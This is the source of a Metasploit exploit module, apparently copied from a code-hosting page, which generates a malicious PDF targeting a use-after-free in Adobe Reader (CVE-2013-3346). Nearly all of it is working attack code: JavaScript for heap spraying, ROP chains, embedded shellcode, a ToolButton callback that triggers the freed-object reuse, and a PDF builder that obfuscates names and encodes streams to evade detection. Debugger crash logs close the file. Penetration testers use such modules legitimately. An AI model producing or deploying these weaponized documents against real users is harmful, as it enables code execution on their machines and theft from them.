Path: blob/master/modules/exploits/windows/fileformat/adobe_toolbutton.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::RopDb1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Adobe Reader ToolButton Use After Free',16'Description' => %q{17This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.618and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where19the cEnable callback can be used to early free the object memory. Later use of the object20allows triggering the use after free condition. This module has been tested successfully21on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in22November, 2013.23},24'License' => MSF_LICENSE,25'Author' => [26'Soroush Dalili', # Vulnerability discovery27'Unknown', # Exploit in the wild28'sinn3r', # Metasploit module29'juan vazquez' # Metasploit module30],31'References' => [32[ 'CVE', '2013-3346' ],33[ 'OSVDB', '96745' ],34[ 'ZDI', '13-212' ],35[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],36[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]37],38'Payload' => {39'Space' => 1024,40'BadChars' => "\x00",41'DisableNops' => true42},43'Platform' => 'win',44'Targets' => [45[ 'Windows XP / Adobe Reader 9/10/11', {}],46],47'Privileged' => false,48'DisclosureDate' => '2013-08-08',49'DefaultTarget' => 0,50'Notes' => {51'Reliability' => UNKNOWN_RELIABILITY,52'Stability' => UNKNOWN_STABILITY,53'SideEffects' => UNKNOWN_SIDE_EFFECTS54}55)56)5758register_options(59[60OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),61]62)63end6465def exploit66js_data = make_js6768# Create the pdf69pdf = make_pdf(js_data)7071print_status("Creating '#{datastore['FILENAME']}' file...")7273file_create(pdf)74end7576def make_js77# CreateFileMappingA + MapViewOfFile + memcpy rop chain78rop_9 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '9' }))79rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))80rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))81escaped_payload = Rex::Text.to_unescape(payload.encoded)8283js = %Q|84function heapSpray(str, str_addr, r_addr) {85var aaa = unescape("%u0c0c");86aaa += aaa;87while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;88var i1 = r_addr - 0x24;89var bbb = aaa.substring(0, i1 / 2);90var sa = str_addr;91while (sa.length < (0x0c0c - r_addr)) sa += sa;92bbb += sa;93bbb += aaa;94var i11 = 0x0c0c - 0x24;95bbb = bbb.substring(0, i11 / 2);96bbb += str;97bbb += aaa;98var i2 = 0x4000 + 0xc000;99var ccc = bbb.substring(0, i2 / 2);100while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;101var i3 = (0x1020 - 0x08) / 2;102var ddd = ccc.substring(0, 0x80000 - i3);103var eee = new Array();104for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";105return;106}107var shellcode = unescape("#{escaped_payload}");108var executable = "";109var rop9 = unescape("#{rop_9}");110var rop10 = unescape("#{rop_10}");111var rop11 = unescape("#{rop_11}");112var r11 = false;113var vulnerable = true;114115var obj_size;116var rop;117var ret_addr;118var rop_addr;119var r_addr;120121if (app.viewerVersion >= 9 && app.viewerVersion < 10 && app.viewerVersion <= 9.504) {122obj_size = 0x330 + 0x1c;123rop = rop9;124ret_addr = unescape("%ua83e%u4a82");125rop_addr = unescape("%u08e8%u0c0c");126r_addr = 0x08e8;127} else if (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) {128obj_size = 0x360 + 0x1c;129rop = rop10;130rop_addr = unescape("%u08e4%u0c0c");131r_addr = 0x08e4;132ret_addr = unescape("%ua8df%u4a82");133} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {134r11 = true;135obj_size = 0x370;136rop = rop11;137rop_addr = unescape("%u08a8%u0c0c");138r_addr = 0x08a8;139ret_addr = unescape("%u8003%u4a84");140} else {141vulnerable = false;142}143144if (vulnerable) {145var payload = rop + shellcode;146heapSpray(payload, ret_addr, r_addr);147148var part1 = "";149if (!r11) {150for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");151}152part1 += rop_addr;153var part2 = "";154var part2_len = obj_size - part1.length * 2;155for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");156var arr = new Array();157158removeButtonFunc = function () {159app.removeToolButton({160cName: "evil"161});162163for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);164}165166addButtonFunc = function () {167app.addToolButton({168cName: "xxx",169cExec: "1",170cEnable: "removeButtonFunc();"171});172}173174app.addToolButton({175cName: "evil",176cExec: "1",177cEnable: "addButtonFunc();"178});179}180|181182js183end184185def random_non_ascii_string(count)186result = ""187count.times do188result << (rand(128) + 128).chr189end190result191end192193def io_def(id)194"%d 0 obj \n" % id195end196197def io_ref(id)198"%d 0 R" % id199end200201# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/202def n_obfu(str)203# return str204result = ""205str.scan(/./u) do |c|206if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'207result << "#%x" % c.unpack("C*")[0]208else209result << c210end211end212result213end214215def ascii_hex_whitespace_encode(str)216result = ""217whitespace = ""218str.each_byte do |b|219result << whitespace << "%02x" % b220whitespace = " " * (rand(3) + 1)221end222result << ">"223end224225def make_pdf(js)226xref = []227eol = "\n"228endobj = "endobj" << eol229230# Randomize PDF version?231pdf = "%PDF-1.5" << eol232pdf << "%" << random_non_ascii_string(4) << eol233234# catalog235xref << pdf.length236pdf << io_def(1) << n_obfu("<<") << eol237pdf << n_obfu("/Pages ") << io_ref(2) << eol238pdf << n_obfu("/Type /Catalog") << eol239pdf << n_obfu("/OpenAction ") << io_ref(4) << eol240# The AcroForm is required to get icucnv36.dll / icucnv40.dll to load241pdf << n_obfu("/AcroForm ") << io_ref(6) << eol242pdf << n_obfu(">>") << eol243pdf << endobj244245# pages array246xref << pdf.length247pdf << io_def(2) << n_obfu("<<") << eol248pdf << n_obfu("/Kids [") << io_ref(3) << "]" << eol249pdf << n_obfu("/Count 1") << eol250pdf << n_obfu("/Type /Pages") << eol251pdf << n_obfu(">>") << eol252pdf << endobj253254# page 1255xref << pdf.length256pdf << io_def(3) << n_obfu("<<") << eol257pdf << n_obfu("/Parent ") << io_ref(2) << eol258pdf << n_obfu("/Type /Page") << eol259pdf << n_obfu(">>") << eol # end obj dict260pdf << endobj261262# js action263xref << pdf.length264pdf << io_def(4) << n_obfu("<<")265pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(5)266pdf << n_obfu(">>") << eol267pdf << endobj268269# js stream270xref << pdf.length271compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))272pdf << io_def(5) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol273pdf << "stream" << eol274pdf << compressed << eol275pdf << "endstream" << eol276pdf << endobj277278###279# The following form related data is required to get icucnv36.dll / icucnv40.dll to load280###281282# form object283xref << pdf.length284pdf << io_def(6)285pdf << n_obfu("<</XFA ") << io_ref(7) << n_obfu(">>") << eol286pdf << endobj287288# form stream289xfa = <<~EOF290<?xml version="1.0" encoding="UTF-8"?>291<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">292<config xmlns="http://www.xfa.org/schema/xci/2.6/">293<present><pdf><interactive>1</interactive></pdf></present>294</config>295<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">296<subform name="form1" layout="tb" locale="en_US">297<pageSet></pageSet>298</subform></template></xdp:xdp>299EOF300301xref << pdf.length302pdf << io_def(7) << n_obfu("<</Length %s>>" % xfa.length) << eol303pdf << "stream" << eol304pdf << xfa << eol305pdf << "endstream" << eol306pdf << endobj307308###309# end form stuff for icucnv36.dll / icucnv40.dll310###311312# trailing stuff313xrefPosition = pdf.length314pdf << "xref" << eol315pdf << "0 %d" % (xref.length + 1) << eol316pdf << "0000000000 65535 f" << eol317xref.each do |index|318pdf << "%010d 00000 n" % index << eol319end320321pdf << "trailer" << eol322pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol323324pdf << "startxref" << eol325pdf << xrefPosition.to_s() << eol326327pdf << "%%EOF" << eol328329end330end331332=begin333334* crash Adobe Reader 10.1.4335336First chance exceptions are reported before any exception handling.337This exception may be expected and handled.338eax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001339eip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy340cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213341AcroRd32_60000000!PDFLTerm+0xbb7cd:342604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????343344* crash Adobe Reader 11.0.2345346(940.d70): Access violation - code c0000005 (first chance)347First chance exceptions are reported before any exception handling.348This exception may be expected and handled.349*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.dll -350eax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000351eip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy352cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213353AcroRd32_60000000!DllCanUnloadNow+0x1493ae:35460197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????355356=end357358359